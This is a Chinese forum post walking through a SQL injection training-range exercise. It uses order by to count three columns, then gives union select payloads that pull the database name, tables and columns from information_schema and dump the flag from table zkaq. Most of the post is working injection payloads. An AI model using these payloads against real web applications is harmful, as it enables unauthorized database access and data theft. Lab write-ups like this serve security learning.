6.1.1-SQL注入-显错注入Rank 1 - Locked

繁夜   ·   发表于 2019-02-15 11:28:05   ·   技术文章投稿区

首先进入靶场 输入id=1


用 ' 闭合掉 order by开始测试字段 最后--+注释后面内容 这里我们发现order by 3正常  order by 4就不正常了 说明有3个字段 


接下来开始查库名

?id=1'  and 1=2 union select 1,2,database()--+


查询表明 这里需要一个一个表去试了 最后找到的是zkaq这个表

?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+


下一步测试字段名

?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='zkaq'--+


爆flag

?id=1'  and 1=2 union select 1,2,group_concat(zKaQ) from zkaq--+

打赏我,让我更有动力~

0 Reply   |  Until 2019-2-15 | 779 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.